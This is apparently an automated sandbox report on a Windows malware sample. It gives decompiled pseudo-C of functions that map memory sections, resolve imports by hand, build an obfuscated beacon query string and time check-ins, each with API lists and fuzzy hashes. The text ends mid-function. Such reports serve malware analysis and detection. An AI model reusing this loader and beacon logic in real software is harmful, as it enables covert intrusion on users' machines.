                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 15111794dbe3d385fa9d14a1052943d95f56a4dd089df96244cdc2e6a59dcfab
                                                          • Instruction ID: 3c13d59491bbd3066eeaba9f77086e21bab5d6bcd814e5de72cab6da458a8322
                                                          • Opcode Fuzzy Hash: 15111794dbe3d385fa9d14a1052943d95f56a4dd089df96244cdc2e6a59dcfab
                                                          • Instruction Fuzzy Hash: D82126B1900259EFDB019F95CC89ADEBFBDFB48744F104022F941EA120E7719A459BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E10001996(intOrPtr* __eax, void** _a4) {
                                                          				int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				int _v28;
                                                          				int _v32;
                                                          				intOrPtr _v36;
                                                          				int _v40;
                                                          				int _v44;
                                                          				void* _v48;
                                                          				void* __esi;
                                                          				long _t34;
                                                          				void* _t39;
                                                          				void* _t47;
                                                          				intOrPtr* _t48;
                                                          
                                                          				_t48 = __eax;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                                          				_v16 = 0;
                                                          				_v12 = 0;
                                                          				_v48 = 0x18;
                                                          				_v44 = 0;
                                                          				_v36 = 0x40;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v28 = 0;
                                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                          				if(_t34 < 0) {
                                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                          				} else {
                                                          					 *_t48 = _v16;
                                                          					_t39 = E10001A44(_t48,  &_v12); // executed
                                                          					_t47 = _t39;
                                                          					if(_t47 != 0) {
                                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                          					} else {
                                                          						memset(_v12, 0, _v24);
                                                          						 *_a4 = _v12;
                                                          					}
                                                          				}
                                                          				return _t47;
                                                          			}



















                                                          APIs
                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 100019F3
                                                            • Part of subcall function 10001A44: NtMapViewOfSection.NTDLL(00000000,000000FF,10001A08,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,10001A08,?), ref: 10001A71
                                                          • memset.NTDLL ref: 10001A15
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID: @
                                                          • API String ID: 2533685722-2766056989
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E10001BAC(void* __edi, intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				intOrPtr* _v12;
                                                          				_Unknown_base(*)()** _v16;
                                                          				signed int _v20;
                                                          				signed short _v24;
                                                          				struct HINSTANCE__* _v28;
                                                          				intOrPtr _t43;
                                                          				intOrPtr* _t45;
                                                          				intOrPtr _t46;
                                                          				struct HINSTANCE__* _t47;
                                                          				intOrPtr* _t49;
                                                          				intOrPtr _t50;
                                                          				signed short _t51;
                                                          				_Unknown_base(*)()* _t53;
                                                          				CHAR* _t54;
                                                          				_Unknown_base(*)()* _t55;
                                                          				void* _t58;
                                                          				signed int _t59;
                                                          				_Unknown_base(*)()* _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t65;
                                                          				signed int _t68;
                                                          				void* _t69;
                                                          				CHAR* _t71;
                                                          				signed short* _t73;
                                                          
                                                          				_t69 = __edi;
                                                          				_v20 = _v20 & 0x00000000;
                                                          				_t59 =  *0x10004140;
                                                          				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                          				if(_t43 != 0) {
                                                          					_t45 = _t43 + __edi;
                                                          					_v12 = _t45;
                                                          					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                          					if(_t46 != 0) {
                                                          						while(1) {
                                                          							_t71 = _t46 + _t69;
                                                          							_t47 = LoadLibraryA(_t71); // executed
                                                          							_v28 = _t47;
                                                          							if(_t47 == 0) {
                                                          								break;
                                                          							}
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_t71 = _t59 - 0x63699bc3;
                                                          							_t49 = _v12;
                                                          							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                          							_t50 =  *_t49;
                                                          							if(_t50 != 0) {
                                                          								L6:
                                                          								_t73 = _t50 + _t69;
                                                          								_v16 = _t61 + _t69;
                                                          								while(1) {
                                                          									_t51 =  *_t73;
                                                          									if(_t51 == 0) {
                                                          										break;
                                                          									}
                                                          									if(__eflags < 0) {
                                                          										__eflags = _t51 - _t69;
                                                          										if(_t51 < _t69) {
                                                          											L12:
                                                          											_t21 =  &_v8;
                                                          											 *_t21 = _v8 & 0x00000000;
                                                          											__eflags =  *_t21;
                                                          											_v24 =  *_t73 & 0x0000ffff;
                                                          										} else {
                                                          											_t65 = _a4;
                                                          											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                          											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                          												goto L12;
                                                          											} else {
                                                          												goto L11;
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_t51 = _t51 + _t69;
                                                          										L11:
                                                          										_v8 = _t51;
                                                          									}
                                                          									_t53 = _v8;
                                                          									__eflags = _t53;
                                                          									if(_t53 == 0) {
                                                          										_t54 = _v24 & 0x0000ffff;
                                                          									} else {
                                                          										_t54 = _t53 + 2;
                                                          									}
                                                          									_t55 = GetProcAddress(_v28, _t54);
                                                          									__eflags = _t55;
                                                          									if(__eflags == 0) {
                                                          										_v20 = _t59 - 0x63699b44;
                                                          									} else {
                                                          										_t68 = _v8;
                                                          										__eflags = _t68;
                                                          										if(_t68 != 0) {
                                                          											 *_t68 = _t59 - 0x63699bc3;
                                                          										}
                                                          										 *_v16 = _t55;
                                                          										_t58 = 0x725990f8 + _t59 * 4;
                                                          										_t73 = _t73 + _t58;
                                                          										_t32 =  &_v16;
                                                          										 *_t32 = _v16 + _t58;
                                                          										__eflags =  *_t32;
                                                          										continue;
                                                          									}
                                                          									goto L23;
                                                          								}
                                                          							} else {
                                                          								_t50 = _t61;
                                                          								if(_t61 != 0) {
                                                          									goto L6;
                                                          								}
                                                          							}
                                                          							L23:
                                                          							_v12 = _v12 + 0x14;
                                                          							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                          							if(_t46 != 0) {
                                                          								continue;
                                                          							} else {
                                                          							}
                                                          							L26:
                                                          							goto L27;
                                                          						}
                                                          						_t60 = _t59 + 0x9c9664bb;
                                                          						__eflags = _t60;
                                                          						_v20 = _t60;
                                                          						goto L26;
                                                          					}
                                                          				}
                                                          				L27:
                                                          				return _v20;
                                                          			}





























                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 10001BE4
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 10001C56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID:
                                                          • API String ID: 2574300362-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E10001A44(void** __esi, PVOID* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				long _t13;
                                                          
                                                          				_v16 = 0;
                                                          				asm("stosd");
                                                          				_v8 = 0;
                                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                          				if(_t13 < 0) {
                                                          					_push(_t13);
                                                          					return __esi[6]();
                                                          				}
                                                          				return 0;
                                                          			}








                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,10001A08,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,10001A08,?), ref: 10001A71
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E005E4AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t59;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t63;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				int _t71;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t78;
                                                          				intOrPtr _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t88;
                                                          				void* _t94;
                                                          				intOrPtr _t100;
                                                          				signed int _t104;
                                                          				char** _t106;
                                                          				int _t109;
                                                          				signed int _t111;
                                                          				intOrPtr* _t112;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr* _t116;
                                                          				intOrPtr* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t126;
                                                          				int _t130;
                                                          				CHAR* _t132;
                                                          				intOrPtr _t133;
                                                          				void* _t134;
                                                          				void* _t143;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t146;
                                                          				void* _t148;
                                                          				long _t152;
                                                          				intOrPtr* _t153;
                                                          				intOrPtr* _t154;
                                                          				intOrPtr* _t157;
                                                          				void* _t158;
                                                          				void* _t160;
                                                          
                                                          				_t143 = __edx;
                                                          				_t134 = __ecx;
                                                          				_t59 = __eax;
                                                          				_v12 = 8;
                                                          				if(__eax == 0) {
                                                          					_t59 = GetTickCount();
                                                          				}
                                                          				_t60 =  *0x5ed018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t61 =  *0x5ed014; // 0x3a87c8cd
                                                          				_t132 = _a16;
                                                          				asm("bswap eax");
                                                          				_t62 =  *0x5ed010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t63 = E005ED00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t64 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t3 = _t64 + 0x5ee633; // 0x74666f73
                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x5ed02c,  *0x5ed004, _t59);
                                                          				_t67 = E005E56CD();
                                                          				_t68 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t4 = _t68 + 0x5ee673; // 0x74707526
                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                          				_t160 = _t158 + 0x38;
                                                          				_t145 = _t144 + _t71; // executed
                                                          				_t72 = E005E58DB(_t134); // executed
                                                          				_t133 = __imp__;
                                                          				_v8 = _t72;
                                                          				if(_t72 != 0) {
                                                          					_t126 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t7 = _t126 + 0x5ee8d4; // 0x736e6426
                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                          					_t160 = _t160 + 0xc;
                                                          					_t145 = _t145 + _t130;
                                                          					HeapFree( *0x5ed238, 0, _v8);
                                                          				}
                                                          				_t73 = E005EA199();
                                                          				_v8 = _t73;
                                                          				if(_t73 != 0) {
                                                          					_t121 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t11 = _t121 + 0x5ee8dc; // 0x6f687726
                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                          					_t160 = _t160 + 0xc;
                                                          					HeapFree( *0x5ed238, 0, _v8);
                                                          				}
                                                          				_t146 =  *0x5ed32c; // 0x16695b0
                                                          				_t75 = E005E4622(0x5ed00a, _t146 + 4);
                                                          				_t152 = 0;
                                                          				_v20 = _t75;
                                                          				if(_t75 == 0) {
                                                          					L26:
                                                          					RtlFreeHeap( *0x5ed238, _t152, _a16); // executed
                                                          					return _v12;
                                                          				} else {
                                                          					_t78 = RtlAllocateHeap( *0x5ed238, 0, 0x800);
                                                          					_v8 = _t78;
                                                          					if(_t78 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x5ed238, _t152, _v20);
                                                          						goto L26;
                                                          					}
                                                          					E005E518F(GetTickCount());
                                                          					_t82 =  *0x5ed32c; // 0x16695b0
                                                          					__imp__(_t82 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t86 =  *0x5ed32c; // 0x16695b0
                                                          					__imp__(_t86 + 0x40);
                                                          					_t88 =  *0x5ed32c; // 0x16695b0
                                                          					_t148 = E005E1BB6(1, _t143, _a16,  *_t88);
                                                          					_v28 = _t148;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t148 == 0) {
                                                          						L24:
                                                          						HeapFree( *0x5ed238, _t152, _v8);
                                                          						goto L25;
                                                          					}
                                                          					StrTrimA(_t148, 0x5ec28c);
                                                          					_push(_t148);
                                                          					_t94 = E005E361A();
                                                          					_v16 = _t94;
                                                          					if(_t94 == 0) {
                                                          						L23:
                                                          						HeapFree( *0x5ed238, _t152, _t148);
                                                          						goto L24;
                                                          					}
                                                          					_t153 = __imp__;
                                                          					 *_t153(_t148, _a4);
                                                          					 *_t153(_v8, _v20);
                                                          					_t154 = __imp__;
                                                          					 *_t154(_v8, _v16);
                                                          					_t100 = E005E9070( *_t154(_v8, _t148), _v8);
                                                          					_a4 = _t100;
                                                          					if(_t100 == 0) {
                                                          						_v12 = 8;
                                                          						L21:
                                                          						E005E6761();
                                                          						L22:
                                                          						HeapFree( *0x5ed238, 0, _v16);
                                                          						_t152 = 0;
                                                          						goto L23;
                                                          					}
                                                          					_t104 = E005E69B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
                                                          					_v12 = _t104;
                                                          					if(_t104 == 0) {
                                                          						_t157 = _v24;
                                                          						_t111 = E005E391F(_t157, _a4, _a8, _a12); // executed
                                                          						_v12 = _t111;
                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                          						_t118 =  *_t157;
                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                          						E005EA734(_t157);
                                                          					}
                                                          					if(_v12 != 0x10d2) {
                                                          						L16:
                                                          						if(_v12 == 0) {
                                                          							_t106 = _a8;
                                                          							if(_t106 != 0) {
                                                          								_t149 =  *_t106;
                                                          								_t155 =  *_a12;
                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                          								_t109 = E005E5800(_t149, _t149, _t155 >> 1);
                                                          								_t148 = _v28;
                                                          								 *_a12 = _t109;
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					} else {
                                                          						if(_a8 != 0) {
                                                          							L19:
                                                          							E005EA734(_a4);
                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                          								goto L22;
                                                          							} else {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						_v12 = _v12 & 0x00000000;
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          			}























































                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 005E4ACA
                                                          • wsprintfA.USER32 ref: 005E4B1A
                                                          • wsprintfA.USER32 ref: 005E4B37
                                                          • wsprintfA.USER32 ref: 005E4B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 005E4B75
                                                          • wsprintfA.USER32 ref: 005E4B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 005E4BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E4BD4
                                                          • GetTickCount.KERNEL32 ref: 005E4BE5
                                                          • RtlEnterCriticalSection.NTDLL(01669570), ref: 005E4BF9
                                                          • RtlLeaveCriticalSection.NTDLL(01669570), ref: 005E4C17
                                                            • Part of subcall function 005E1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,005E20C2,?,016695B0), ref: 005E1BE1
                                                            • Part of subcall function 005E1BB6: lstrlen.KERNEL32(?,?,?,005E20C2,?,016695B0), ref: 005E1BE9
                                                            • Part of subcall function 005E1BB6: strcpy.NTDLL ref: 005E1C00
                                                            • Part of subcall function 005E1BB6: lstrcat.KERNEL32(00000000,?), ref: 005E1C0B
                                                            • Part of subcall function 005E1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,005E20C2,?,016695B0), ref: 005E1C28
                                                          • StrTrimA.SHLWAPI(00000000,005EC28C,?,016695B0), ref: 005E4C4E
                                                            • Part of subcall function 005E361A: lstrlen.KERNEL32(01669A78,00000000,00000000,7742C740,005E20ED,00000000), ref: 005E362A
                                                            • Part of subcall function 005E361A: lstrlen.KERNEL32(?), ref: 005E3632
                                                            • Part of subcall function 005E361A: lstrcpy.KERNEL32(00000000,01669A78), ref: 005E3646
                                                            • Part of subcall function 005E361A: lstrcat.KERNEL32(00000000,?), ref: 005E3651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 005E4C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 005E4C77
                                                          • lstrcat.KERNEL32(?,?), ref: 005E4C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 005E4C8B
                                                            • Part of subcall function 005E9070: lstrlen.KERNEL32(?,00000000,01669A98,00000000,005E8808,01669C76,?,?,?,?,?,63699BC3,00000005,005ED00C), ref: 005E9077
                                                            • Part of subcall function 005E9070: mbstowcs.NTDLL ref: 005E90A0
                                                            • Part of subcall function 005E9070: memset.NTDLL ref: 005E90B2
                                                          • wcstombs.NTDLL ref: 005E4D1C
                                                            • Part of subcall function 005E391F: SysAllocString.OLEAUT32(?), ref: 005E395A
                                                            • Part of subcall function 005E391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 005E39DD
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 005E4D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 005E4D69
                                                          • HeapFree.KERNEL32(00000000,?,?,016695B0), ref: 005E4D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 005E4D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 005E4D8D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: a6564b511670c9722a67b8f3cd008d12e6191d74e91580ba0a3185be502d5440
                                                          • Instruction ID: 85f6585e9f79eb8cd6eefabc2aae5e0fcdf91ce9e6b178170d0672ca740616d6
                                                          • Opcode Fuzzy Hash: a6564b511670c9722a67b8f3cd008d12e6191d74e91580ba0a3185be502d5440
                                                          • Instruction Fuzzy Hash: 32915771900289AFCB19DFA6DC88AAE7FB9FF58310F144454F984DB220DB31D955EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E005E51B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t60;
                                                          				long _t64;
                                                          				signed int _t65;
                                                          				void* _t68;
                                                          				void* _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t73 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x5ed240);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L005EAF2E();
                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t73;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0x5ed26c; // 0x270
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x5ed24c = 5;
                                                          						} else {
                                                          							_t68 = E005E8D14(_t73); // executed
                                                          							if(_t68 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0x5ed260 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t71 = _v12;
                                                          						_t58 = _t71 << 4;
                                                          						_t21 =  &_v20; // 0x5e5d5e
                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                          						_t72 = _t71 + 1;
                                                          						_v24 = _t71 + 1;
                                                          						_t60 = E005EA376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76, _t21,  &_v16); // executed
                                                          						_v8.LowPart = _t60;
                                                          						if(_t60 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t65 = _v24;
                                                          						_v12 = _t65;
                                                          						_t90 = _t65 - 3;
                                                          						if(_t65 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_v8.LowPart = E005E36B1(_t72, _t90,  &_v92, _a4, _a8);
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t60 - 0x10d2;
                                                          						if(_t60 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x5ed244);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x5ed248; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t60 = E005E6761();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x5ed248);
                                                          								L21:
                                                          								L005EAF2E();
                                                          								_v36.LowPart = _t60;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								_v8.LowPart = _t64;
                                                          								__eflags = _t64;
                                                          								if(_t64 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t70 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							HeapFree( *0x5ed238, 0, _t54);
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t70 = _t70 - 1;
                                                          					} while (_t70 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}

                                                          APIs
                                                          • memset.NTDLL ref: 005E51C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 005E51D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 005E51F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 005E5212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 005E522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E52C1
                                                          • CloseHandle.KERNEL32(?), ref: 005E52D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 005E530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,^]^,?), ref: 005E5320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 005E532B
                                                            • Part of subcall function 005E8D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01669368,00000000,?,74B5F710,00000000,74B5F730), ref: 005E8D63
                                                            • Part of subcall function 005E8D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,016693A0,?,00000000,30314549,00000014,004F0053,0166935C), ref: 005E8E00
                                                            • Part of subcall function 005E8D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,005E523E), ref: 005E8E12
                                                          • GetLastError.KERNEL32 ref: 005E533D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID: ^]^
                                                          • API String ID: 3521023985-447055170
                                                          • Opcode ID: 33dc7e3ac7872409d08092e38e481ff4559bc827206571f5146cf78bc796de62
                                                          • Instruction ID: 4cec46c5e35cd41653fab27a4585e85c6bba0ea3f32928870786c812981edae5
                                                          • Opcode Fuzzy Hash: 33dc7e3ac7872409d08092e38e481ff4559bc827206571f5146cf78bc796de62
                                                          • Instruction Fuzzy Hash: D151AF74801268EBCF19DF96DC88DEEBFB8FF49724F204615F590A6190E7309A44DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E005EAC55(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				struct HINSTANCE__* _t99;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x5e0000;
                                                          				_t115 = _t139[3] + 0x5e0000;
                                                          				_t131 = _t139[4] + 0x5e0000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x5e0000;
                                                          				_v16 = _t139[5] + 0x5e0000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
